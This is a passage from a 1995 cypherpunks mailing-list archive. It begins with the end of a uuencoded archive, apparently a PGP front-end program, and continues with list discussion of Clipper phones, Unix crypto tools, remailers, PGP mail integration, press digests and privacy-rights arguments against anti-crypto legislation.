M:\5JEJ/]F:-*Y @+/4N\!$\U+Z(5-R[?8O265)&F +HS\R,P$R)'B Y71,"0M
M""Z19NB0T<OXYRTF.JN-\<EE<!!@>8"2Z,$"'>DS[U!"*&X ]8378:% ?*9WM
M,$E 1+6U\+HM\XZ=-.-925/))*Z2&+ :+:;Z5<.VG!& 662&:J3S@%##WBGAM
M&4;",M:J;_,&-GS:6$ETL7%X",XO5J[2L6%*)7'( .'P%00<EHW+,299<]U#M
MT1VG<C9#L8.,9;P 0U[9X L!(I5''4 47#TPM'RP'HPHXC7+L]6BE8S)R(8XM
M$)\@3D@G!+,) L3;"M"N).X1RW$S6>\ !OC\ YY!E$T:ASZ$(N\888XT3.;:M
M#!2,(#&"" ,Y"(Y;J\Z; ^)&G"W0>['BCM)D!E"7.(*,PTS-AL@&4+"<K,%LM
M1OX.'+)QZ,E\(T<Y)K!J&@$K""Z. PLS)TW,-&PTM# !"($"+45E!24&AY4NM
MXMA)8P%K=K#@DL!-TM )&C! &D/\F&"$2; @^=(HG!P ^51L73N,DI#49!G%M
M;%'.$=XT2>Z,_$Q8)7&F/$6/9A (%1H?6*V.$)W  >EEY  X928_/<#,-3-:M
MDT',&:"E)])*H%R6:Y%"2[@1BD0V;3:2B=E*&%%\.$SNM>(N(.[-[HP\8GH;M
M&P/NURL<HA8Y)6:A9"$Y[I53-#]K"M-%O"#NGAQH]Q.PD8XU1&DS=8DN(LKNM
MQ,O2KZ4#-MO:]L0Y($K+*J,%76LP&H( @P+)1VH D9^'V)0#&%0N8O$*)Z78M
MA,BT+6IEXIC-("=)HK65TWR_CDS%E-7*?AY,%*9,#\V3"PF$/P=JD-E'JM(RM
M.* #8XU+8?9I3XH\<IB-_VR47I[V_IJO&DU< 3SO5@>7&Q'2$@(6#N9U*IBIM
MO&)2CR0J<FJ0C1302]*U,>QQ+H')Z 806T0KXPRW5VW7^YY7KYS[;:[4=-H-M
M_Z(RN!UH2][ZTJZVO+(8M( AW>OSGM^^*(N^5\,OMDYAX"!..26K,%\!RR9PM
MQ,P(<V\@&AI<7D,5@LVR=BUZ\?W^[L5O0!JQ:&'^F67S22HQ.!H9SXTN1UGUM
M[V/JANI!'@[G.:Z\JQQC"8-<")@A$CJ6,N8?1T]H@[3BLA>EIY7\'F1[/IY7M
MHC@B(:_ 'VD IG>WRW#LRTB+OI(@/PC>(-D"\PQ^$@BS'9!J8J% .GZI\.%.M
M8&Y"C0BK'6 &P4Q!#L(RJVUE+$I&1E4)C&"\P*("0H38A/6;?AS*E"TM/BIYM
M/%.EHH=$N9K1R@$\E=(0>FW0:[[J7_J-P:MZA2!576-%1*#X!E:RHL1ATS@XM
MH0LFWE;$('0G<X[ZVY^K(!JM1>G^P[\Z_>-_5;O=_K^ %A7OUBO9<@Q#63,8M
MFHH W7] LI#8#!/,CR 'U$$KK=).5$*,8/PH4E.PN8Q>Z;^/6C;MUTP";F1;M
M[$"2A&HDP2$Q 7UQ%R<KE#)(DG1^%$ ,-%9:[K$PQ:*#G)Y0O7*H;- \6J04M
M^E @K3@Z"1.#2%=GDJ:P"X1@L47;[MB#C @7L='7X2X@3;9&Y[<"_V#E1\\&M
M 5=&PL>\PA6B"&=$Y6ZOT_";,%OO5KP,51:DT5"%NK""Y1Q:^J\&&V1="\L[M
MQ2\$6KM;RTI&Q6)M%ME.5N6-]><0\1!&D@N&9O&$/.9D*6H))DY8]&"*66I3M
MY2S0(4RV^2**08>1:DS7I;(H51=Y@F7JH%049TO-*+X#3/P8]2&?)*$-=XK!M
M']B'<OV9U1:DCU_G-60%YJ1,T:B(*(D,8?PBYY@"C)J<$HJVM(.+I8B3)0A=M
M)N9D;AQB()ETG)PI6D$3)ENIA2 ;G0,9&:1!37O;.NEOR0!ZH.X^D]Q58>.HM
M2TV_?6476.(7G4".+0E9!8CVE4RM(=JP/\9&P$)7X--HB5%N/79FUVLX8!GVM
MX4&V V]/(-&>8OTL@[>B'YJ0G5AQ85C+@05OLQTS0(5$0)0Z-RZ&1<^Y/$H3M
M&BDO.WAJXRVQ<D&6G]&;\U]BAIGKD&N.0#Q'P4I%ND+J];AJ WNV5%MKM<[ M
M6, -I$+K"H7CH (3P"!?4+%+0K9\>RM0P^>Z "H#K& ;,&C.5$IQ!I+:^&O>M
M_QDM8MY4H^T.8#&Z[*(FL;F;0'4FU^F* ()3*H9A-,/6A_=P ,N-+3EQ].N&M
M33IDK-%>8#(;\#:4D3"S&P1<__7( ?)B0V1?%!,,8/X7F4E[N.1%53-Q> A M
M@4SY*B& N-!S$(Z5>J&S2HCP<BOWY)/7%/H@L<)$9:CCTL@LD1QBU>#.U'BLM
ML% 88^"0[0/Z_E1KQ4O>YF)-99-,>FJ@E(SP)7')*+*.< E>'[<2.IS/.9Y?M
MD]%"V7@#5W8/A#$8 @94.H]TNJ\='+I$S#R*$@5F QH='>=3.E982,A@3<)GM
MS4=A#8UC-I;Y0['!;:1IN(BF.2>)VWJJ(_IH4T,P?DZ3Z93<,"*&/,%AFZ:WM
M\$P(=7#E@6PDT[O"2KTLZO%D@FV5;R7S+(DKT9!V$%%;L0(?A"EO*1[8$,Q M
MRGA+%O%X&&8ZTU#8%U.9F&I.L&0#8J3W39U:_(&S+=!U_:E74*NP-QP/X&_@M
MS0MGCM%\&(+(&DBD7S"Z]:76;L";I,3(<V<W&.U'NN::MA(OQL$<0NF1JJ@7M
MYITV"0H; L.R(>;&V4)M^AMO "(';Z H8S_!!BNY1*!+,S9( NP**ZB]#>HMM
MJJD-/CH#[X/PV3>;\-L)"[C$"/$\"P(Y-!NG+%*.J5U- UO!M;A.'!1;B(L,M
M["TBQSS'2@B(7\@%4I,V<-A9U+&PX!-A37,5;Z<N+*D463J1$P=!@-461LA2M
MVAY=0615T7749:16*).:^!+-&>"M:\%2UTTV3)#C;!=8/]2(9D:5T#KJ]VW6M
M]\!L63O%CUU$-;-MOKW=U;"C<M;1>Q[HKY487'J[:I20^$M=$M$512Z3)1P8M
M6%PY5M0QG["!+\:A2^4( )9#)'AQ8Z>TX]G(K\0W=OG *BU4O.^EK>B PT6TM
MN3II*39X-",!O$UR(URF2?V05?$AO0^.'+?Y[5BS:4-I)69CE&5P!8*37!FCM
MVQIJ+< L#C=-<#M?DH,V.^CP/V>SC+:8HW%,-4==<P8W1HT$G%'86(#L,7G-M
M9*ZHV"?'$EFP5?YBU=&EAPHN5A@]= IM,(C?!A1X_U57.LIVNZ38A-]:G+.QM
M8;U;9FQNE#HH([D*=L?JWL:;'M, %:4/ZQ>'OSO&S893$($-#VD.VJ'9H-ONM
MK5#W@X3E7%#C8^, /?G##\U,LJ@GX\*K*3_RUI835S[^Z7G=9K7FZ8T0\@6ZM
MP"I>HH ?XEXLOTH$&"#HQ]'!M3S$I;PG,B F$&SR>"-M19WB7(VCN+0?34N@M
M^"7@Z11D&W0C<UR=J1\+4>_L@1-X"-'JU/W&%S'P;@?BW!O<>%Z;;$W=:_HMM
M;^#U^GL ZO1 V?K^1;LZN.YYHG;IU:[$C=]LBD;5;_ZBR9T=;',?UT^DMY^GM
MR?TT-D9N(LV<AW+P-(PM2<D*4:DE\1*+Q0GV'7F%/NPGN4_/S/8[<&?9LE9_M
M@>0'![KTQO$+MJB!=C=@9I6"T03O\ONC)N ^)]L,2(*]RIY&!H/# C#G'SQOM
MQ0PV>#@=<_KCT)3GW32UMLK^-!J%+;4<<0"QW?U#JASE#S5/Z&KXWNC@_V>XM
M89MDU)J@^7-W?[!-&\328= CM'$H;8GSE]'FKR#-?TR9I9;=NF(=:_%^V":,M
M@C2A,J;&J!$U!M*8IW%!@0BC;#Z5')7#%U0HU&0J9IA=OZ<AT69O%(?)BJ6^M
M1KERW[J"1]#GE%I2V(<6L4#>QM8_7X!8RFGD1#BZ>D.PTA>9X?/3D% 26M?]M
M@2[D.-&-T)D X_HT)%K8"/,!30FL*0,_J?:<[:"$Q.;6S.P2<@V:98O'[#&GM
MW>5!$U;MUWQ?5-,9U@_)Z\^24.TIXK6IDBF0;^>F'$R3Z>KLTY X)H<5E3KMM
MDE-^IVBQ3)A2H+O'ZD#]D2;<TE(N(DWJXAKMC5&VBFC#$<:,]'X,*Q&6C"I[M
M!120<@X@3=,%#YC5A<G!\TS)> ^_06GW(WM2& OCWA),\4A#GOM!^J+<;^"%M
MZ+"*25-F+@K/CW],(FT%RF9H&_N'6K115D179MDJ2<,M2(62IVH&61@;F&);M
M4+>X[:'C5-;D5"O#BD-N,@EV 3, 3WL23P'BIA;)'7%1J*1N#>&LB1,8F>YAM
M[,:)+C!C?R]N'1$>A&!@FN%6V):[G]U,4KNYB%U?W%K!Z^ESU>]*[Q'OE<38M
M?<6]C![!195L=3N]0;4]T%+>M[N3<I]X,AJ-%+DUPQKB/$;@V.#"PKXW/AO&M
MCYHA4(RI-$T%\SUD)G/2$)/PZ@*&"39_L=D1"Y4FL@NFD&'3:*"M,Y<E61KWM
M7]:#K7(LRB>+;(\%<4:N*_8#ESR9V?NO<-F!WR]"S3^XIC_B,/\W%^66%PC2M
M9ZQZF?5LZ(%X5!6*"?:*>Y?)=&G$#UM,J-(TH@YI?21F#S"%+7"T2WN.B?ICM
M 0FM-7'-'O]$M :/NH^7V2SQU*IMVL AEH<Z&]LK;BUMV2)=$',$CE!K(ZFFM
M[D!'X+!MQX;@F%[]N0Q'U\ZV8O@]/(")L0^VL?ZLTB$V*^V)]7Z)E+5 SC*WM
M%_$TE.U5VD4\7,4@763YT6>,B/$XS%.K^ MIOV]N24WL;L:1(\HT>&G01L7=M
MHPHBN=.K8KD:/*#'9C[Y!#TVLO@]U7P71[?/??STL\G18@7HDOX#;?H3#-TRM
M,7]&F0S2?UR9_J]T:7N1.W3)+.+_1W8*!/^D[&!MJ25C2*#Y$,>&GWS$2^("M
M9G;,'W3;#SR;(>Y>E;/''-N^&=W_@6/#S=,K[B@U=D5_"H&0N,&*AX(L";+]M
M:[&F(&0K23A3$?V4=?WA/RQS_3&EE@=/OVHW8''EM.1DLZ65\L8]Q&"*&Y*.M
M@K^$W"S.N74& OD26$ ,P-0>9@)COF&60&2K2MRMC %NF.@2$SJ)\M-06/JHM
MP'].6P7>P*L7X)#;L5KM%<)E).5V;;_\XC:O4(=\;CJ<G)TNWJ/=TF6Y<=S1M
M]C#T#\RF9!3SZ=BB;3FSV_"FKV^9W%GM*/K&Z7A)?\)[S#=%NPEUML?\^(:JM
M>S;<UTZ\8(K;%&9V.+DOB7<(J7&=>DQH?Q48JT^J0,)K8&Q'JRA-@,E(=^5OM
M8 *YH-Y;!3*YDA8G0D$V2NW@V,=!K6FTM[ N=&RHD *X)0[D !8]6 Z?+2K*M
MFGS<Q3>U?=K8F@G:LD4;RAL:D4*,'(>&Y0 4QEAEMA7QTFMV'R0PYF-,- H$M
M;CM;2VUC&Q!C>K![Z(K/6"&;Z57;6WTXT2= ]I#_[;)P<8[#T&2?*BA2S1I1M
M]P YXK4#:]NP '.4:$#)Z5-V;H/8OA=A]\F<HN-4BA&DCID92"TJF=#=,C)WM
M>GM!L[$S2X7.X9L=-;H9'8I;9+SGKO#,BZ2V9&RY06G0A\G)05M2Z=UVVV0;M
M*I2,D 5+MT)AQR*(*QW;VMI2MW!FMB4]3K / AVZ/F1N.[>HNX@+I8#+$)ZOM
M'P+2W>M2?*[[_2N^* "/+1#/!ZUNT>.O]SKH/>< $:+XD#K<W&=/ 0BN]]&NM
MO\QTG[(^O%?@4C#:]%\60[FC(4>R")^W;VM-K]JSY_^P)]Q"HN9P/H6/94LZM
MN[N(S3+HP@2T!+KCFXAI@=!8"TD?-X%P!*7>FB6A.RJY_J<;.[&OPZ@,^FN7M
MS!,PF^9D#G5<6P:V.YVVA\M;X4D8JJ88)\.--D3% B%;/:6C2> 1X!WP+-1(M
MHD]I.L=5MDYL6#"&K2QY.?=08LF9VSU13^ 9+\PY$V<O'1%5[F>+\-*%)T[6M
M<O_+SM.'$JTZX(4'2S'DT6<]4F5.0P5:PTV;C\P-4^G\)\K/4 9WAV&";A^(M
MGB;?)!T]G$?!';+.1"-.QN[(558QMR?HLP"S-3F;.9])7]'Q/1Q(#_7\U#=.M
MD&(^:FO_2ZU>682>.Z0",3?WBE"BUPZQ&75"J;*Y4,$VE:/:$O,1-O:=,C9XM
M=(9:XOEL!IVOT\?J<9^,D,4&U*2,+Q(DUV#P?I4YTLX=BF4^QZM,\^&.IL/BM
M5@O05J.L=&#B!350(18Y@B4=(\M-VQ[FR3*2#%^;/M_9TIA$<XZ@T+W< 96+M
M$UKF_AIOX_Z:1^4*#7-UF42A;M+;:8J':QWI@.6@-DF WQ_4_;;39@%_=ZX'M
MW*HQJ'N]GFO?/+8;LR15-J:AO5IJ M;:I[:B[&RS@J';LPY^ALVC2)P<T$49M
M( ULH&"1KF'4<9RQGNS-%G.^Y\=B4)KK'9J2R-=SQ:"<<Y"8ZV)G(YI$2>>FM
MT;Z]P)[N691SW1,F/G[[%M:0XRE14]9TCS"2"^/-)G0Y4XQCL;,W-!55]Z0@M
M'U:A35^T#T5++D'!&Q!R" OIJA?M#[B;&_O=BH,[.LS526UA)GEZLJLV9D^5M
M>\X4+3_VG6+?'+!"17CH;/,HQ":^[)_IF-0TP5Q?T%%Y0Q,]DVY$MR#H^*1?M
M-\$W1XYLNQ4=#Z"^<@3H[HP%UL3@ATIF3%>^Y(575YQV?_1JIY\:9AU= )6%M
M#-(DR\@K\I5!P!LRL[H]GW(8/!()R4JF+0A%OVR7$[14,M]E2_0U+V1M3.*0M
MJODTHJT_:LD?:PNH%\!L EL%60]2ZA(XC;3W0:7O*6Q DQ@FUDI&Z+R&*<2[M
M_S '36 =NS GF;.'KY.BBY O#Z)($6E-0!Y!@L(%/)F<I'=X*Q/ZZ&V,,.O8M
M/(+^#^<8ZL-+MA[CD(=;@A],5+/#4//G99>NSECOR-B+09!C5_*@LIC%%14NM
M8%#5&*\#3;7KOC/=P[N\MD$_?:N:^9S]]NY4=.5T)OK@,MHW#]^H01@K>G(>M
MA2!=K;9X^_;TY,2<HYM B&N(\/+=&[#*[]^>'AZ?O'EKB+IQ.=DV$8L+[(K[M
M0)2;@].!3-,\9AOLZYW: 9\\U1<6<%^Z<YK/37LY1\(+.HHN[YEXZ5YG<2!>M
MEM@-\Q&#DF47RIU[U0A7O_#HR21)*^9V#[.*9!4#M3%*<K9_IKPLVT)B-_&3M
M$5V%,HXP.N'D&BL.P%7*KYVC.NA/VZ;Y)#,1&%UUAB?7.<AU%["C*F7H2#1PM
MCBZ@)QVX0\T%/N9L58B4BR 8Y6.0V#G/Y]7S]99-%J*XV8K-:?;!Y4I9N"S4M
M[9$%%QRDT+->9Y@?K!/-PN*V%L &[_WB>US8YDZB(=4*S"DS%R5S.8OQ=':AM
MTNU%A[!RB1NCYLZQ:'-3TDHA%W]R?=T!PBP]=JU-I50LZ)0Y.%+$&GW+%V<%M
M%$M/S04'7.U@@NMT!F^$RS9T%[SK?[VMO'Y]W:=0$I-2[<0SOJMEAE<I 95 M
M94%FPBE%MG-XBI<WN) 0X;&*Z:HK!(.+LE0T-_Z9>T+F>(M#1L>_=^Y.::TPM
MJ@^_W%1[O6I[\$5 ;EIK5OV6URMH\NBE<YS!T\'?- 4+39$5U3$A%#*YCX%BM
MD,10>$;.J^Q<]X0Y% :W%"SI6YOX+8NYGB123#F5HIKE.H'B\WA1CB4B<[BLM
MN,?-@-"'\\I<T$DI>L@Y+\=3]5;@,) +L.H$BT'LS/C'=!/RZ79'>)^]]D#TM
M+ZO-IKCPS\\[;5'KM+K7H#9X?*]^71OTL13:]*OG34\TL"&Z_<5NF72]FE]MM
ME@%8S:\#)/Q>Z[3[WJ=K^$L_JOL]KS; 7NJ^W_*;D+[7JZWJA=>WE4P8WKRNM
MXRT&^@E-U.Q 'MMIB//KOM_VX#N=)QSTR_:78BV ;^^Z._ [$%,_&.>W 5RKM
MRD\!<&=PB<OS:M=MO]JSJ\%Q!Z+:\_N("8;E  1K#M=]#[Z"A_+[_!6!^.WJM
MN=_T0?X&'7K#>I9+GU"]Z%5;92*P\!N/$_>RB@2&EZKUSW[?J]O*+,_=!:1\M
M/1'\U+^N71HB%1G44_=Q/A8/6G\)," D=^ XFV#D*P:8/H =S(X@U_'KB& =M
M$R#^7'.T^_P9Y$/@45X?GQ[5&F\:WJGWEJZ./7K][NC-ZP>(B;_M"&Y^?_[LM
M:G-?3?P=$I6Z>'\J3NKBU!/'K\59731JXO@=6//W,(-X_5;4WHOSM^+X7)R\M
M$]X9$^80/^?@!MJ4<G2OSYM^35QY7\1YLU.[HL?/G^E+<3_@+10X:O:IUJY&M
M)R?+'UZU6O6\:N<DN%TV;JN=1;MY-DZ2FXNSV1N5OVJ^.A]];=0O/H;?@GJWM
M_J,V:0Z2Q0S(D%9/.VWEY[?+5XVKKGP]:9U.96<]K.7CV/>NOB=Y>S4<]G^DM
MT=?S[-7KWU8?K\?-SXTPD^W9CX\0X-R^_1+<>.F/QH]1_[IW]>9\>3ONO5M]M
M/ZI^C!LK^<-OK;]^>W_V(^R,TG'C0GW_>%WO];K=RU>#:;5Z/7C^+*]]O1H>M
M3Q:^UX)_OZ[E33L-CL\6?OU^%LRFW^1)>SF\.X_ES<=H>'RZ^')\EG>3N^KTM
MD]_P:J?GSY^]ODGR[MF;=_,OS?>+E7>NQDG]Z$2FX%_]QJ+3!EJ>G7U]TYPWM
MWKZ]>%6?C)??P^GZM',9W76/.I/@^;.S66?\Q5^W!]\OEH/5\.NHEB;SL!&&M
MW]][-]7;;E7Z@%[0ZUY^]F:3>K/Q)6U5TU&W]6KV6^-5O_7\V44C6C<'[R>UM
MQD4K:EY\.GK_^=/=,KV[^+$\[;V[>C7(U8]N%G8^+=7)Y]7'UMER<-JL+3OKM
MBQ]O\C<_P+-%GVJ?J^/K3\V1.DK>.E3ZY%5O5]U75QVY"K_'R?IS^_9-L'H_M
M&7I?O_;DR<W=J[?WS3N@PVT\7:277[^U_,'1R:?;X^SN)FK<?V^_ZG_J7LW'M
MO]W+JU7G\]&Z&9]=_OB<+\>W]>7=Z<??U*M)EGB-WYX_>[.Z.KV:OIXTN[]UM
M9M_2V^7Y;YT14/_C]=?@-#R7S8O.Q=&762R;)ZOT(J]]>??U^_)KM]N=A^'[M
MW@12PG<7?EC]?CD.7K?^_OS9W]=5;/(F^?7:]9\)]_-G_P-02P,$%  "  @ M
M/ 9['5I7WE#H 0  X04   P   !214=)4U1%4BY&4DVM5$MKVT 0OHOH/\PAM
MT!H2X5P-A10G,;JDH@DYM)2RWAU)2U:[ZCX2].\[:TF.:QS%AHYTV,?,-\_]M
M /9D)==KHV%IFC9XM%!8(P+W#HI5 7?6:']YJT6:P*0\H7628*ZR^:3J=ZRDM
M\Y;YJ'QG;),F:5(H9 ZAE$J!U.!K6ANES*O4%1V4I-8;,"W H@\V*DD'\0:\M
M6420T4-I)7]V1E]7F\0R;C8^OOP?29.S-,G)S9(*P[B'_"V\-+D\+'UP]ZS!M
MQ4XI?D_+F-/GV!FFN]GB-+-'Z17.%B=Z^RJ$1>=.-=N7(\V6TG<7\."9[ROSM
MH1D<+S]D2TT2.'@R07O;?9#7&-=MPZ3:J<41Z<0OSZ.C5J*CH1Q&'>U[8S'TM
M*=="OD@1F'*S."6A6=,K-.6(M)4KN(;S>3:?Q\TY0%SN#DF#EDNF9C"!0L%.M
MH.S+H_%,'>[N@6:_52&';_2&+:R6Q99.WJ]"[WO@ %XC?P9&1.!KYH&UK>JVM
MS_LG_((') YH\!]:B/\!A]-&KS5J* .1"4([<AZCC<5-*&(7X,;H3Q[< $.OM
MD>A'5V/&9_E3;#QU0.\G.H+D)70F0,U>-N; !^T+<*&JT,60:(.Z9IKC<&7QM
M3Z"K>.YYU@.U?9VDYBH(C%S9 *6.V5C^OU!+ 0(4!A0  @ ( %NZ>AUD7-6!M
M!BP  "Y3   +            ( "V@0    !'0U!01U!&12YE>%!+ 0(4!A0 M
M   ( "NI?!T*W"K-1"   '9:   ,          $ ( "V@2\L  !'0U!01U!&M
M12Y$;V-02P$"% 84  ( "  \!GL=6E?>4.@!  #A!0  #          ! "  M
MMH&=3   4D5'25-415(N1E)-4$L%!@     #  , K0   *].     %!+ P0*M
M      !<J7P=JCCZ&Y@   "8    #    $=#4%!'4$9%+G-I9XD E0,% "[:M
MF\&5 T43SQ_DY0$!/I\$ ,.H; PCC]##KS-8KV-[#R.=M:LD(;5:Q PYDBC$M
M* _#Z.<A)^L98K'X,W.D,E[UP8!.-F'34V<*>Q0M'>T+!0[[5.*:O<NX,R_WM
MX%;G/@W H%L"%/AZ4@3UD@EP6(7JKJKE O@+K!7&>@.);+*/\35T2PUW^#HDM
MQFJ1'0@J%2P+4$L#!!0  @ ( " '>QV.B1S(# $  "H"   '    4D5!1"Y-M
M1851L6Z#,!3<D?B'URG)$-2NV:+@( 94! QM-PL>8,7X5<80Y>]K4TI5(=2;M
MK*>[=^=[18OPR<L;;Q >-$#+1P2-)8H1*]A'ES2-TI?GX"-.#]"W-,@*2E*&M
M"P6F1=^K24JZ"]5 +23V)]_S/7#(V#D,$@8+BE;T$VFA?&^_,K=]&IS!O1SGM
MQ\0N/LWL%18Y>ULL$!@DO-0T._VC#%\OO\J*RJ%#:VL$J2UIQJ(X+U@67+,$M
MYM :&]$;/>F@)MUMB=?8AZ1V!NZD]0..1Q!F9TO2B$^'=4UY'"UA[01RT2ANM
M!HW39P. =WO!DBL8>K37L74;VHHR<BDJ;AR/F[^7L#J-7,J'#4(==!BX*%]0M
M2P$"% 8*      !1J7P=I^[K+G)/  !R3P  #            "  MH$     M
M1T-04$=01D4N6DE04$L! A0&"@      7*E\':HX^AN8    F     P     M
M       @ +:!G$\  $=#4%!'4$9%+G-I9U!+ 0(4!A0  @ ( " '>QV.B1S(M
M# $  "H"   '          $ ( "V@5Y0  !214%$+DU%4$L%!@     #  , M
*J0   (]1        M
 M
end
size 21070


----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 16 Jul 95 10:31:39 PDT
To: Carl Ellison <cme@TIS.COM>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <9507142311.AA09635@tis.com>
Message-ID: <Pine.D-G.3.91.950716003841.26405B-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 14 Jul 1995, Carl Ellison wrote:
...
> Meanwhile, the Federal civil forfeiture fund goes to good things.  The last
> $9M (I believe it was) went to buying up AT&T DES phones to be made into
> Clipper phones.  Of course, the conversion hasn't happened yet and the DES
> phones are sitting in a warehouse someplace -- but the $9M fund went to
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Nope.  There is one right here in my office.  And it makes me feel so 
safe and secure.

Seriously, I have used it in secure mode once -- to test it.  I'd be more 
likely to use my STU-III if I really want to be secure.


> really good use, saving the world from AT&T DES.
> 
> (sarcasm off)
> 
> +--------------------------------------------------------------------------+
> |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
> |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
> |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
> +----------------------------------------------------------- Jean Ellison -+

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alex <cp@proust.suba.com>
Date: Sat, 15 Jul 95 22:45:21 PDT
To: cypherpunks@toad.com
Subject: Re: unix, vanguard
In-Reply-To: <199507160403.VAA04878@jobe.shell.portal.com>
Message-ID: <199507160550.AAA05385@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> What are some "robust crypto tools" that are available for unix, and also
> aren't available for DOS/Windows?

Mixmaster, CFS, premail, the alias system at alpha.c2.org, etc.

I know there are similar versions of some of these on pc boxes (sfs, 
secure drive, and private idaho), and those are good packages.  But using 
private idaho on a pc is still a lot more of a hassle than using premail 
on a unix box (the latter can be completely transparent), and although I 
haven't seen the source code to private idaho, I'll be willing to bet 
it's a lot more complicated than the premail script.

If you want to do something like Raph's remailer list, would you rather 
implement it on a pc running windows or with a perl script on a unix 
box?

SFS is a great program, it works well, and it's very useful.  But the 
design of CFS, which runs as an NFS server, is more elegant.  Would you 
rather drop a new cipher into secure drive or sfs, or into CFS?

> I kinda think the reason more tools aren't available for PCs (Windows/Mac)
> is because there is no appreciable MARKET for such tools yet.  If there
> were, since PCs have a market share an order of magnitude or two larger
> than unix, such tools would have a greater influence anyway.  

Did the market produce these unix tools?  If Zimmermann was a 
businessman, wouldn't he have produced weak exportable code?  Sometimes 
innovative products create the market, rather than the other way around.  
If there's a market for remailers, I'm inclined to think it's because we 
were able to glimpse the possibilities thanks to the original perl based 
type I remailer.

As I said before, unix has a lot of problems.  It's a crummy os if you
want to write letters or do desktop publishing:  even if you have good
software to do these things, the system's going to cost you too much if
that's all you're using your computer for.  But if have an idea for a
remailer and you'd like to throw something together over a weekend that
will work, it's hard to beat it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sun, 16 Jul 95 01:18:30 PDT
To: cypherpunks@toad.com
Subject: Re: Unix not the Only Place for "Vanguard" Applications
Message-ID: <199507160827.EAA00243@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


Cypherpunks, as they say, write code.

It doesn't really matter very much what platform cypherpunks write
code for, as long as we actually write code.  Progress comes from
getting stuff done and making results available so that others can
expand on it and use it, not from sitting around optimizing what
should be done (by others, of course) in the future.  (Ever notice
how, every time this comes up, the question is always something
like "why aren't people writing more software for platform X?" and
never "I want to write some software - does anyone have any
suggestions on which platform would have the most impact?")

Every minute spent arguing about whether Unix, DOS, Macs or VIC-20s
constitute the optimal platform for writing and deploying crypto
software is a minute during which no crypto code is being written
or deployed for Unix, DOS, Macs, or VIC-20s.

Just write code.  For whatever platform you like writing code for.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Tue, 18 Jul 95 08:00:25 PDT
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Deployment
In-Reply-To: <199507160119.SAA10662@blob.best.net>
Message-ID: <Pine.3.89.9507161551.A1196-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 15 Jul 1995, James A. Donald wrote:

> Uh, pardon my ignorance, but what is privtool, and why is it
> a good thing to port it to windows?

It's a PGP-aware mailer for SunOS/Linux, and has the most
highly-integrated PGP interface that I know of (e.g. just tick a
check-box to encrypt/sign/remail). Even a newbie Windows user can handle
that much.. 

> (As compared to the task of integrating PGP into microsofts
> mail tool.)

Well, someone's (mm@qpsx.oz.au, dunno if they're on the list) already done 
that for MS-Mail, at least in Beta form, according to their article on 
alt.security.pgp... However, their message implies that you have to use 
extra commands on the menus in order to deal with PGP mail, it's not 
just there waiting for you to tick the box..

		Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 16 Jul 95 06:24:19 PDT
To: cypherpunks@toad.com
Subject: FAM_15\"
Message-ID: <199507161324.JAA26100@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-16-95. NYPaper:


   "New Concerns Raised Over a Computer Smut Study. 'They
   wanted to be famous.' It worked."

      Growing controversy over a widely publicized study of
      on-line computer pornography, conducted by a researcher
      at Carnegie Mellon University, has prompted the
      university to investigate whether the research violated
      ethical or academic guidelines. The investigation
      follows the disclosure by angry faculty members that an
      undergraduate student and his principal faculty adviser
      at Carnegie Mellon spied on the private computer habits
      of nearly 3,000 students, staff members and other
      faculty members last year as part of the research study
      into pornography viewing habits.               KEY_hol


   "Documents Were Destroyed as F.B.I. Resisted Seige
   Investigation. Hints of a cover-up: more embarrassment over
   a fatal confrontation."

      A Justice Department report not yet made public on the
      F.B.I.'s standoff with a white separatist in Idaho shows
      that in late 1992 and early 1993 F.B.I. managers were
      frantically trying to block Federal prosecutors from
      obtaining the Bureau's records on the case. Justice
      Department investigators, who uncovered the document
      destruction, have found that a career F.B.I. official
      stripped the files of official records that would have
      clearly shown if top F.B.I. officials in Washington were
      in command of the operation.                   FOL_hah


   Siamese:  FAM_15"











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Sun, 16 Jul 95 09:04:16 PDT
To: CYPHERPUNKS@toad.com
Subject: Root Causes
Message-ID: <8AD5238.000300015C.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


DK> It would seem that things such as the CDA, etc, are patent violations of the
DK> Bill of Rights. As such, wouldn't the Congressrodent(s) proposing such
DK> measures be violating our civil rights, and thus be criminally liable?

  Congressional Immunity.

DK> IANAL, of course, so I'll leave it up to those on the list who are to

  IANAL, either.  But I have a thought, myself:

     [Please do not start an abortion flamefest on the list. If you want
     to argue it via Imail, I can handle that, but let's not bother the
     rest of the class, OK?]

  The Supremes found the right to have an abortion in some kind of
"penumbral" right to <BOLD> privacy </BOLD>, which in turn came from
Griswold v. Connecticut, if organic RAM serves. Given this precedent,
may we challenge anti-crypto crap such as the Grassley Bill as a
violation of the right to privacy?


 * Recursion: See "recursion".
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Sun, 16 Jul 95 09:04:20 PDT
To: CYPHERPUNKS@toad.com
